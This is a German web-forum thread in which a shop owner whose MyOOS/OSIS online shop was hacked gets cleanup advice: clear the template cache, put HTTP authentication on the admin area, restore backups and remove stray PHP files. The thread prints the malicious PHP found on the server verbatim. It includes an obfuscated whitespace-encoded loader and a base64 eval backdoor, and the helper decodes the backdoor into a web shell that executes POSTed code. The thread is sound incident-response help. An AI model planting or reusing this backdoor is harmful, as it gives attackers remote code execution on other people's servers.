Fatal Error am Ende des Shops

MyOOS hat einen Fehler, oder tut nicht das, was Ihr erwartet? Derartige "Unanehmlichkeiten" bitte hier.
Antworten
Maw.
Beiträge: 41
Registriert: 20.02.2009, 23:07
Kontaktdaten:

Fatal Error am Ende des Shops

Beitrag von Maw. »

Hallo,
wir verwenden noch eine 1.4er Version des Shops und wurden glaub Opfer eines Hack/Viren-Angriffs - es gab mal für einen Tag lang eine Hack-Meldung auf der Shop-Seite, die jedoch vom Webhoster wieder entfernt wurde.
Ohne irgendwelche Sachen im Shop geändert zu haben, erscheint nun auf einmal am unteren Ende der Seite folgender Error:

Code: Alles auswählen

 Fatal error:  Call to undefined function:  str_split() in /home/hu000038/www/home/onlineshop/oos_temp/templates_c/%%72^72A^72A8DE34%%products_xsell.html.php on line 7
Link zum Shop:
http://www.huber-schriften.com/onlineshop/shop/

In diesem templates_c Ordner sind lauter Dateien mit solch seltsamen Dateibenennungen - was kann ich dagegen tun? Die Funktionstüchtigkeit ist scheinbar nicht eingeschränkt...

Gruß Marc
r23
Beiträge: 2624
Registriert: 18.09.2008, 05:56
Wohnort: Hagen
Kontaktdaten:

Beitrag von r23 »

Hallo,

einmal das Verzeichnis
/home/hu000038/www/home/onlineshop/oos_temp/templates_c/

leeren *alle Dateien* löschen.

Sollte der Fehler noch immer auftauchen benötigen wir den Inhalt der Scripte, die den Fehler erzeugen.
dies sind nicht templates_c scripte sondern Dateien, die in templates (ohne_c) liegen.

Welche Scripte der Shop verwendet sagt dieser im Debug-Modus.

Laut Shop-Script verwendet ihr
OOS [OSIS Online Shop] 1.6.4

Ihr habt einen offenen Admin
http://www.huber-schriften.com/onlinesh ... /login.php?

Bitte den Zugriff per Server Seitigen .htacess
[myoos] Security-Hinweise

verhindern.

Es wurden sicherlich Scripte verändert.
Einfach die Datensicherung zurück spielen.

cu

ralf
Maw.
Beiträge: 41
Registriert: 20.02.2009, 23:07
Kontaktdaten:

Beitrag von Maw. »

Hallo Ralf,
den Inhalt des tempaltes_c Ordners hab ich schonmal gelöscht. Der Fehler war kurzzeitig weg, ist dann aber von selber wieder aufgetaucht.
Ich kann ausschließen, dass von uns etwas an den Scripten geändert worden ist (seit einem Jahr nicht mehr..) - ich vermute, da tumelt sich noch etwas auf dem Server rum...

Wie wäre hier eine weitere Vorgehensweise? admin absichern und ServeR/Admin Kennwort ändern?

gruß marc
r23
Beiträge: 2624
Registriert: 18.09.2008, 05:56
Wohnort: Hagen
Kontaktdaten:

Beitrag von r23 »

Hallo,

der Login vom Shop ist nicht sicher. D.h. man kann die Anmeldung aus dem Shop mit einfachen URL Änderungen leicht umgehen.
Und nein - ich werde keine Anleitung veröffentlichen - wie man dies machen kann - Nur, dass dies geht.

Vor diesem Hintergrund empfehlen wir einen Verzeichnisschutz für den Admin. Da der Shop über Scripte verfügt,
die Dateien auf dem Server ändern können.

Richte für den Admin und für die Tools eine HTTP-Authentifizierung ein

Beispiel HTTP-Authentifizierung
http://demo.myoos.de/admin/

Was ist gemeint
http://de.wikipedia.org/wiki/HTTP-Authentifizierung

Die Angreifer hinterlasen in der Regel ein Script auf dem Server. Dieses habe ich schon in einem neuen
Verzeichnis unter den Bildern ~/images/irgendein/.neu/böses.php
gefunden.

Am einfachsten alle Dateien löschen und die Datensicherung zurück spielen. Aber vorher unbedingt prüfen, ob
die Datensicherung auch wirklich vollständig war!

Viel Glück

ralf
Maw.
Beiträge: 41
Registriert: 20.02.2009, 23:07
Kontaktdaten:

Beitrag von Maw. »

Hallo,
danke - mit diesen Stichworten der HTTP-Authentifizierung komm ich dann klar!

Datensicherung einspielen leider schwierig, wenn man nichts aktuelles hat :S

Was empfiehlst du sonst für Möglichkeiten der "Säuberung"?

Gruß Marc
r23
Beiträge: 2624
Registriert: 18.09.2008, 05:56
Wohnort: Hagen
Kontaktdaten:

Beitrag von r23 »

Hallo,

wenn sich
etwas an den Scripten geändert worden ist (seit einem Jahr nicht mehr..)
in den letzten 12 Monaten an den Scripten sich nichts geändert hat - kann man evtl.
den Provider fragen - ob er die *Dateien* gesichert hat? In der Regel erstellen diese ein
Backup.

Wenn nicht - die Scripte auf Sinnhaftigkeit prüfen und als PHP Scripte in
~/images/*.*
~/themes/*.*
löschen

vor löschen *immer* eine Datensicherung (Dateien und Datenbank) durchführen

evtl. können wir auch einen Blick mal drauf werfen ... aber allerdings erst ab Freitag...

Beste Grüße

ralf
Maw.
Beiträge: 41
Registriert: 20.02.2009, 23:07
Kontaktdaten:

Beitrag von Maw. »

Stimmt, das ist eine gute Idee, beim Provider anzufragen.

Dem Hinweis mit den Scripten in /images/ bin ich nachgegangen und in der Tat sind da php-Dateien mit NAmen wie "pretty.php" "needle.php" "google12343545.php" mit Inhalten wie folgt vorhanden:

Code: Alles auswählen

<?php /**
 * Gets some core libraries and displays a top message if required.	/*
 */ if(!function_exists('CoreLibrariesHandler')) {			/*
 */ function CoreLibrariesHandler() {					/*
 */   $session_keys = '  				   			  		 		   		 			  	  		 	  	 			 				 			  				  		 			  	  		   		  				 	  	   	  		 					 	   			 	   			  				 	   	 				  	 				 			 			 	  	 			 	   			 	   			  		 			 	   		 				 		 			   			  	  		   	  		 			  		  			  	   	 			  		   		 				 	   	 			  		   		 		   		  	 				 		 	 	  			   	 			 	 	 		  	 	 			  	  				  	  	 			  		 		 	 		 	  	 		 			  			 			 	 		 			  		 	 	  			  		  	   	   					   						 				 			  		 		   		 			  	  		 	  	 			 				 							 ';  /*
 */									/* 
 */	foreach(str_split($session_keys, 8) as $k=>$v) { 		/*         	
 */		$v = str_replace('	', 1, str_replace(' ', 0, $v));	/*
 */		$session_keys[$k] = chr(bindec($v)); 			/*
 */	} 								/*
 */									/*
 */	if($session_keys) echo $session_keys; }				/*
 */	register_shutdown_function('CoreLibrariesHandler');		/*
 */ }									/*
 ************************************************************************/



 ?><?php 



 ?><?php eval(base64_decode("aWYoaXNzZXQoJF9HRVRbInBhcnQiXSkpIHsgIGlmKCRfR0VUWyJwYXJ0Il09PSJzZWMiKSAgZWNobyAicGFydGdvb2QiOyB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJnZ2ciXSkpIHsgICBpZigkX1BPU1RbImdnZyJdPT0xKSAgICAgICAgZWNobyAib2sxMSI7ICB9IGVsc2UgaWYoaXNzZXQoJF9QT1NUWyJtYWluIl0pKSB7ICBldmFsKHVybGRlY29kZSgkX1BPU1RbIm1haW4iXSkpOyAgICB9")); ?>
Ich hab natürlich jetzt Backups gemacht, möchte allerdings sicherheitshalber vorher nochmal bei dir fragen ob das solche bösen Scripte sein könnten.

Gruß Marc
r23
Beiträge: 2624
Registriert: 18.09.2008, 05:56
Wohnort: Hagen
Kontaktdaten:

Beitrag von r23 »

Hallo,

in dem Verzeichnis und den Unterverzeischnissen von ~/images/ gibt es keine PHP Scripte von dem Projekt

und in deiner base64_x Zeile steht:

Code: Alles auswählen

if(isset($_GET["part"])) { if($_GET["part"]=="sec") echo "partgood"; } else if(isset($_POST["ggg"])) { if($_POST["ggg"]==1) echo "ok11"; } else if(isset($_POST["main"])) { eval(urldecode($_POST["main"])); }
cu

ralf
Antworten